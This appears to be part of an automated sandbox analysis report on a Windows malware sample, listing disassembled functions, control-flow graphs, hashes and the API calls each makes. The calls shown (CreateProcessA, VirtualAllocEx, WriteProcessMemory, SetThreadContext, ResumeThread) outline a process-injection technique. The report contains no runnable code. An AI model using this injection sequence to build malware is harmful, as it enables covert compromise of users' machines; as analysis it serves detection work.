
                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 663 7483f7b 664 7483f7c-7483fcd 663->664 670 7483fcf-7483fd5 664->670 671 7483fe5-7484037 664->671 672 7483fd9-7483fdb 670->672 673 7483fd7 670->673 679 7484039-748403f 671->679 680 748404f-748405d 671->680 672->671 673->671 681 7484041 679->681 682 7484043-7484045 679->682 683 7483f51-7483f66 680->683 681->680 682->680 684 7483f6c 683->684 685 7484130-7484137 683->685 684->664 684->685 686 748409b-7484111 684->686 687 7483f4c 684->687 688 7484062-7484065 684->688 710 7484113 call 7488c78 686->710 711 7484113 call 74884ef 686->711 712 7484113 call 7488c61 686->712 687->683 715 7484068 call 7486448 688->715 716 7484068 call 7486445 688->716 689 748406e-7484075 702 748407a call 7487f18 689->702 703 748407a call 7487f28 689->703 704 748407a call 74880d8 689->704 705 748407a call 7488169 689->705 706 748407a call 748726c 689->706 707 748407a call 748728c 689->707 708 748407a call 74872ac 689->708 709 748407a call 7488120 689->709 691 7484080 713 7484082 call 7488788 691->713 714 7484082 call 748877b 691->714 693 7484088-7484096 693->683 700 7484119 701 7484120-748412b 700->701 701->683 702->691 703->691 704->691 705->691 706->691 707->691 708->691 709->691 710->700 711->700 712->700 713->693 714->693 715->689 716->689
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: d6a6109d53628739ec219b8fb734a9e0a073911761d4b3e27fa8a90be8c01dbd
                                        • Instruction ID: 4820ca492dee0d429cf49c4d64246adb2d9268a7a10392de7344a3bc48070d90
                                        • Opcode Fuzzy Hash: d6a6109d53628739ec219b8fb734a9e0a073911761d4b3e27fa8a90be8c01dbd
                                        • Instruction Fuzzy Hash: 06418234B002099FDB489F75D955BAE7AF3BF88B00F208469E9069B395CE75DC05CB50
                                        Function 02D41EB5 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 717 2d41eb5-2d41f55 720 2d41f57-2d41f61 717->720 721 2d41f8e-2d41fae 717->721 720->721 722 2d41f63-2d41f65 720->722 726 2d41fe7-2d42016 721->726 727 2d41fb0-2d41fba 721->727 724 2d41f67-2d41f71 722->724 725 2d41f88-2d41f8b 722->725 728 2d41f75-2d41f84 724->728 729 2d41f73 724->729 725->721 737 2d4204f-2d42109 CreateProcessA 726->737 738 2d42018-2d42022 726->738 727->726 730 2d41fbc-2d41fbe 727->730 728->728 731 2d41f86 728->731 729->728 732 2d41fc0-2d41fca 730->732 733 2d41fe1-2d41fe4 730->733 731->725 735 2d41fcc 732->735 736 2d41fce-2d41fdd 732->736 733->726 735->736 736->736 739 2d41fdf 736->739 749 2d42112-2d42198 737->749 750 2d4210b-2d42111 737->750 738->737 740 2d42024-2d42026 738->740 739->733 742 2d42028-2d42032 740->742 743 2d42049-2d4204c 740->743 744 2d42034 742->744 745 2d42036-2d42045 742->745 743->737 744->745 745->745 746 2d42047 745->746 746->743 760 2d421a8-2d421ac 749->760 761 2d4219a-2d4219e 749->761 750->749 762 2d421bc-2d421c0 760->762 763 2d421ae-2d421b2 760->763 761->760 764 2d421a0 761->764 766 2d421d0-2d421d4 762->766 767 2d421c2-2d421c6 762->767 763->762 765 2d421b4 763->765 764->760 765->762 769 2d421e6-2d421ed 766->769 770 2d421d6-2d421dc 766->770 767->766 768 2d421c8 767->768 768->766 771 2d42204 769->771 772 2d421ef-2d421fe 769->772 770->769 773 2d42205 771->773 772->771 773->773
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D420F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 3efaf52c13d119647e39e61751adec5d3315353bfe6784b35b71a6b6643866a1
                                        • Instruction ID: 3d460f17c2baa55748ca5f3abd73fe85e6d3ff31b29b8b294528492fb186acce
                                        • Opcode Fuzzy Hash: 3efaf52c13d119647e39e61751adec5d3315353bfe6784b35b71a6b6643866a1
                                        • Instruction Fuzzy Hash: 98A15A71D00219DFEB24CFA8C844BEEBBF2BF44314F1481A9E819A7294DB749985CF91
                                        Function 02D41EC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 775 2d41ec0-2d41f55 777 2d41f57-2d41f61 775->777 778 2d41f8e-2d41fae 775->778 777->778 779 2d41f63-2d41f65 777->779 783 2d41fe7-2d42016 778->783 784 2d41fb0-2d41fba 778->784 781 2d41f67-2d41f71 779->781 782 2d41f88-2d41f8b 779->782 785 2d41f75-2d41f84 781->785 786 2d41f73 781->786 782->778 794 2d4204f-2d42109 CreateProcessA 783->794 795 2d42018-2d42022 783->795 784->783 787 2d41fbc-2d41fbe 784->787 785->785 788 2d41f86 785->788 786->785 789 2d41fc0-2d41fca 787->789 790 2d41fe1-2d41fe4 787->790 788->782 792 2d41fcc 789->792 793 2d41fce-2d41fdd 789->793 790->783 792->793 793->793 796 2d41fdf 793->796 806 2d42112-2d42198 794->806 807 2d4210b-2d42111 794->807 795->794 797 2d42024-2d42026 795->797 796->790 799 2d42028-2d42032 797->799 800 2d42049-2d4204c 797->800 801 2d42034 799->801 802 2d42036-2d42045 799->802 800->794 801->802 802->802 803 2d42047 802->803 803->800 817 2d421a8-2d421ac 806->817 818 2d4219a-2d4219e 806->818 807->806 819 2d421bc-2d421c0 817->819 820 2d421ae-2d421b2 817->820 818->817 821 2d421a0 818->821 823 2d421d0-2d421d4 819->823 824 2d421c2-2d421c6 819->824 820->819 822 2d421b4 820->822 821->817 822->819 826 2d421e6-2d421ed 823->826 827 2d421d6-2d421dc 823->827 824->823 825 2d421c8 824->825 825->823 828 2d42204 826->828 829 2d421ef-2d421fe 826->829 827->826 830 2d42205 828->830 829->828 830->830
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D420F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0cef09a62b040d999f461c9cd9af0fcb2cbd75c78750a0bba8e377b5179ad249
                                        • Instruction ID: c1b08fe2be93874644634e65f5652810a55ccebe2360daed4cceb7dea853e5cb
                                        • Opcode Fuzzy Hash: 0cef09a62b040d999f461c9cd9af0fcb2cbd75c78750a0bba8e377b5179ad249
                                        • Instruction Fuzzy Hash: CD913A71D002198FDB24CFA8C845BEEBBF2BF44314F1481A9E819A7394DB759985CF91
                                        Function 02E0ADA8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 832 2e0ada8-2e0adb7 833 2e0ade3-2e0ade7 832->833 834 2e0adb9-2e0adc6 call 2e0a100 832->834 835 2e0ade9-2e0adf3 833->835 836 2e0adfb-2e0ae3c 833->836 841 2e0adc8 834->841 842 2e0addc 834->842 835->836 843 2e0ae49-2e0ae57 836->843 844 2e0ae3e-2e0ae46 836->844 889 2e0adce call 2e0b040 841->889 890 2e0adce call 2e0b031 841->890 842->833 846 2e0ae59-2e0ae5e 843->846 847 2e0ae7b-2e0ae7d 843->847 844->843 845 2e0add4-2e0add6 845->842 848 2e0af18-2e0af2f 845->848 850 2e0ae60-2e0ae67 call 2e0a10c 846->850 851 2e0ae69 846->851 849 2e0ae80-2e0ae87 847->849 865 2e0af31-2e0af90 848->865 853 2e0ae94-2e0ae9b 849->853 854 2e0ae89-2e0ae91 849->854 852 2e0ae6b-2e0ae79 850->852 851->852 852->849 856 2e0aea8-2e0aeaa call 2e0a11c 853->856 857 2e0ae9d-2e0aea5 853->857 854->853 861 2e0aeaf-2e0aeb1 856->861 857->856 863 2e0aeb3-2e0aebb 861->863 864 2e0aebe-2e0aec3 861->864 863->864 866 2e0aee1-2e0aeee 864->866 867 2e0aec5-2e0aecc 864->867 883 2e0af92-2e0afd8 865->883 873 2e0aef0-2e0af0e 866->873 874 2e0af11-2e0af17 866->874 867->866 868 2e0aece-2e0aede call 2e0a12c call 2e0a13c 867->868 868->866 873->874 884 2e0afe0-2e0b00b GetModuleHandleW 883->884 885 2e0afda-2e0afdd 883->885 886 2e0b014-2e0b028 884->886 887 2e0b00d-2e0b013 884->887 885->884 887->886 889->845 890->845
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AFFE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 4d237c94706825babee92040b1030cdcf7a238eb60200991a49c53fce43296c1
                                        • Instruction ID: a3baf398dbad35b492a50ed1f9c353db7caf8635d36dc256500c3592b1c6f5ca
                                        • Opcode Fuzzy Hash: 4d237c94706825babee92040b1030cdcf7a238eb60200991a49c53fce43296c1
                                        • Instruction Fuzzy Hash: 697126B0A40B098FD724DF29D49575ABBF5BF48308F008929D586D7B90DB75E886CB90
                                        Function 02E044E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 891 2e044e0-2e059d9 CreateActCtxA 894 2e059e2-2e05a3c 891->894 895 2e059db-2e059e1 891->895 902 2e05a4b-2e05a4f 894->902 903 2e05a3e-2e05a41 894->903 895->894 904 2e05a60-2e05a90 902->904 905 2e05a51-2e05a5d 902->905 903->902 909 2e05a42 904->909 910 2e05a92-2e05a97 904->910 905->904 911 2e05ab2-2e05ab7 909->911 912 2e05a44-2e05a4a 909->912 913 2e05b09-2e05b14 910->913 911->913 912->902
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 700b25ce82485b479f172c62b60789f94995b9a5b1b69c3c279919acdc2fdcfd
                                        • Instruction ID: 76d18a570b87b8f34b0419bcff88bbddceff1e9cbe696f671d53dae5030c84a8
                                        • Opcode Fuzzy Hash: 700b25ce82485b479f172c62b60789f94995b9a5b1b69c3c279919acdc2fdcfd
                                        • Instruction Fuzzy Hash: 184105B0C0071DCBDB24CFA9C98479EBBF5BF44304F60806AD408AB295D7756946CF90
                                        Function 02E0590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 914 2e0590c-2e05913 915 2e05918-2e059d9 CreateActCtxA 914->915 917 2e059e2-2e05a3c 915->917 918 2e059db-2e059e1 915->918 925 2e05a4b-2e05a4f 917->925 926 2e05a3e-2e05a41 917->926 918->917 927 2e05a60-2e05a90 925->927 928 2e05a51-2e05a5d 925->928 926->925 932 2e05a42 927->932 933 2e05a92-2e05a97 927->933 928->927 934 2e05ab2-2e05ab7 932->934 935 2e05a44-2e05a4a 932->935 936 2e05b09-2e05b14 933->936 934->936 935->925
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ca4bbfb6887b094303ea984d0e7f502297102641a5397b1e06bdf34cab186d59
                                        • Instruction ID: 0980dc9af3f53b67be7704081561d144de47c59adfa1a013c1a7c3d3f952b701
                                        • Opcode Fuzzy Hash: ca4bbfb6887b094303ea984d0e7f502297102641a5397b1e06bdf34cab186d59
                                        • Instruction Fuzzy Hash: DA41F5B1C0061DCBDB24CFA9C984B9EBBF5BF44304F60806AD409AB294DB75694ACF90
                                        Function 02D41C30 Relevance: 1.6, APIs: 1, Instructions: 83injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 937 2d41c30-2d41c35 938 2d41c37-2d41c86 937->938 939 2d41c08-2d41c21 937->939 942 2d41c96-2d41cd5 WriteProcessMemory 938->942 943 2d41c88-2d41c94 938->943 945 2d41cd7-2d41cdd 942->945 946 2d41cde-2d41d0e 942->946 943->942 945->946
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02D41CC8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: b80e39247281584c07b7b72c4ffe7cdd2857a090d904657ea5b1e4330f6a53ea
                                        • Instruction ID: ee680f018ed28fedefa6dff1aae982cb89e91019ac9462d145b024bcdd35aec7
                                        • Opcode Fuzzy Hash: b80e39247281584c07b7b72c4ffe7cdd2857a090d904657ea5b1e4330f6a53ea
                                        • Instruction Fuzzy Hash: C63138B59002499FCB10CFA9C9456EEFBF1FF88314F10842AE959A7240C7799955DFA0
                                        Function 02D415B0 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 950 2d415b0-2d415b5 951 2d415b7-2d41627 ResumeThread 950->951 952 2d41588-2d4158d 950->952 958 2d41630-2d41655 951->958 959 2d41629-2d4162f 951->959 953 2d4158f-2d41591 952->953 954 2d4151a-2d41549 952->954 956 2d41599-2d415a2 953->956 959->958
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02D4161A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 59fef1eae04c20d7f28ef419adcb3f3a225203d8274c1c771ee2b5a9fbd99293
                                        • Instruction ID: 6c1aed0381a7751c3826d88847cf7e7df4d36f994408ff1890fc10373ec9fd59
                                        • Opcode Fuzzy Hash: 59fef1eae04c20d7f28ef419adcb3f3a225203d8274c1c771ee2b5a9fbd99293
                                        • Instruction Fuzzy Hash: 8131BDB5D042898FCB21CFA9C8856EEFBF0EF59314F14859AD449A3301CB349946CFA1
                                        Function 02D41D21 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D41DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ac0bfb4e4fa19baa3481cfe7180cb1cd7c1bc7cfbfea8a7735d39bc60e8cdfe4
                                        • Instruction ID: 21fb4d0baad69bffaba46644fbc6c41b863a5d2f566b8a48bde5bc60c2b3a651
                                        • Opcode Fuzzy Hash: ac0bfb4e4fa19baa3481cfe7180cb1cd7c1bc7cfbfea8a7735d39bc60e8cdfe4
                                        • Instruction Fuzzy Hash: 5C318CB2D002499FCB10CFA9D884BEEFBF0FF48320F10842AE559A7241C7399545DBA1
                                        Function 02D41C38 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02D41CC8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: db252c754d874270100063438f8ed363bd20d2d6d333ccb29f7a8056d32f9b48
                                        • Instruction ID: 8ff4ad14df82525ba22df031103be89f2be2b4c958ea6d24ce3c88e6f2f3a0cc
                                        • Opcode Fuzzy Hash: db252c754d874270100063438f8ed363bd20d2d6d333ccb29f7a8056d32f9b48
                                        • Instruction Fuzzy Hash: FF2107B59003599FCB10DFAAC985BEEBBF5FF48314F108429E919A7340D7789944DBA0
                                        Function 02D41660 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D416E6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 8a8d793855a9d5113dda3d4835637ef3786002b57e3ca6ab3ff77ffc7fd439a3
                                        • Instruction ID: 1e8219318a1812e414881421be958e5ef5f5c4598505126d35e2a5eb6b49f29a
                                        • Opcode Fuzzy Hash: 8a8d793855a9d5113dda3d4835637ef3786002b57e3ca6ab3ff77ffc7fd439a3
                                        • Instruction Fuzzy Hash: 572145B1D002498FDB10DFAAC485BEEBFF4AF49314F14842AD459A7241CB789985CFA4
                                        Function 02E0B790 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0D646,?,?,?,?,?), ref: 02E0D707
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: aa41802af3b1f35846d6023ee3dd1fd77289d73c0b938df79fabe22f89a6f464
                                        • Instruction ID: aafa9f899344c78d4f1230e59082712d4a9c55b918d46df8f4b056d98bb17bf4
                                        • Opcode Fuzzy Hash: aa41802af3b1f35846d6023ee3dd1fd77289d73c0b938df79fabe22f89a6f464
                                        • Instruction Fuzzy Hash: FB21E3B5900248DFDB10CF9AD984AEEBBF8EB48314F14845AE918A3350D378A954CFA4
                                        Function 02D41668 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D416E6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 6584be035ec656cd13a81550383b60d7dd7c924c7b65be01a8f693eabb95fc24
                                        • Instruction ID: bf67086146b25812d1567c3998a487b7d6e14af5aab10907a09dffebb71a480b
                                        • Opcode Fuzzy Hash: 6584be035ec656cd13a81550383b60d7dd7c924c7b65be01a8f693eabb95fc24
                                        • Instruction Fuzzy Hash: 142134B19002098FDB10DFAAC585BAEBBF4EF48314F14842AD519A7240CB78A984CFA0
                                        Function 02D41D28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D41DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 166662281195c130e671ac903fa1dd8ec0451950cb41e82850cac472f545826a
                                        • Instruction ID: 3348494137ad6da742703c35278d82a9f72fdc328220065ff8fbbc980e621199
                                        • Opcode Fuzzy Hash: 166662281195c130e671ac903fa1dd8ec0451950cb41e82850cac472f545826a
                                        • Instruction Fuzzy Hash: 4A213AB1D003499FCB10DFAAC944AEEFBF5FF48314F508429E519A7240C7399944CBA0
                                        Function 02E0D678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0D646,?,?,?,?,?), ref: 02E0D707
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 50409df97be1917ad1c439db9040a94a7858b511bb71fe3c1903f69d671663c7
                                        • Instruction ID: 0b3eb3111b9c7808ea4d7559b678515db14513aae4f7219397bc9b145dcc6b10
                                        • Opcode Fuzzy Hash: 50409df97be1917ad1c439db9040a94a7858b511bb71fe3c1903f69d671663c7
                                        • Instruction Fuzzy Hash: 7E21B3B59002099FDB10CF99D985ADEBBF5FB48314F14845AE918A3350D378A955CFA0
                                        Function 02D41B70 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D41BE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 44e330cef0e40fc26d24a95e11a979d4683383d4079026d92f9dd955742b9969
                                        • Instruction ID: 446effe3a70ec92ff9d8c09678d2f17a45d118f854c203b5e8f93590da632f48
                                        • Opcode Fuzzy Hash: 44e330cef0e40fc26d24a95e11a979d4683383d4079026d92f9dd955742b9969
                                        • Instruction Fuzzy Hash: 3D2147759002499FDB10DFAAC844AEFBFF5EF49314F148419E519A7250CB359984CFA1
                                        Function 02E0A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0B079,00000800,00000000,00000000), ref: 02E0B28A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: a65eb9a470e33cdc82f51cf22b228d5057055ac5ffe0f90b9ae7627de366ec7b
                                        • Instruction ID: c90e1cd26d87544ec54c752c3a173c3bf79dc8cbc254b1b4b17e7466ebe7fe2a
                                        • Opcode Fuzzy Hash: a65eb9a470e33cdc82f51cf22b228d5057055ac5ffe0f90b9ae7627de366ec7b
                                        • Instruction Fuzzy Hash: 251114B69003099FCB10CF9AD484ADEFBF4FB48318F10842EE519A7240C379A545CFA4
                                        Function 02D41B78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D41BE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: cc54f9f0fc49dbaeb0185e713cb623b98a8b1440344b589faac8af9d1aa661e8
                                        • Instruction ID: 9ae66b66f45f8013b9e91415eb9e1355aa44222b61636acad8144d1102d19918
                                        • Opcode Fuzzy Hash: cc54f9f0fc49dbaeb0185e713cb623b98a8b1440344b589faac8af9d1aa661e8
                                        • Instruction Fuzzy Hash: EB1137759002499FCB10DFAAC844AEFBFF5FF49314F108419E519A7250CB79A944CFA1
                                        Function 02E0B219 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0B079,00000800,00000000,00000000), ref: 02E0B28A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 97a3550824e33341aee2c9765988c581bd9f8afb5dd46bf482eef273699fdbc6
                                        • Instruction ID: adceef4f89e037d1dfd7a5dd8dc3257b30006b5dafd459d6f747ea32892e3e02
                                        • Opcode Fuzzy Hash: 97a3550824e33341aee2c9765988c581bd9f8afb5dd46bf482eef273699fdbc6
                                        • Instruction Fuzzy Hash: D711F0B6D002099FDB10CF9AC984BDEFBF4BB48318F14842EE519A7650C379A585CFA4
                                        Function 02D47E80 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02D47D39,?,?), ref: 02D47EE0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 21daa1d7ade49eaa3f7d221054ea0f8cb72c5b37bc426d2b72c56fae9a9e7b17
                                        • Instruction ID: 329b66e7e838b04bf11051d292db8a39abc445eae3ec2d6bd44e5e08505d6863
                                        • Opcode Fuzzy Hash: 21daa1d7ade49eaa3f7d221054ea0f8cb72c5b37bc426d2b72c56fae9a9e7b17
                                        • Instruction Fuzzy Hash: B51132B580024ACFDB10DF9AC544BDEBBF4EB49320F148469D958A7640C738A984CFA1
                                        Function 02D46E50 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02D47D39,?,?), ref: 02D47EE0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
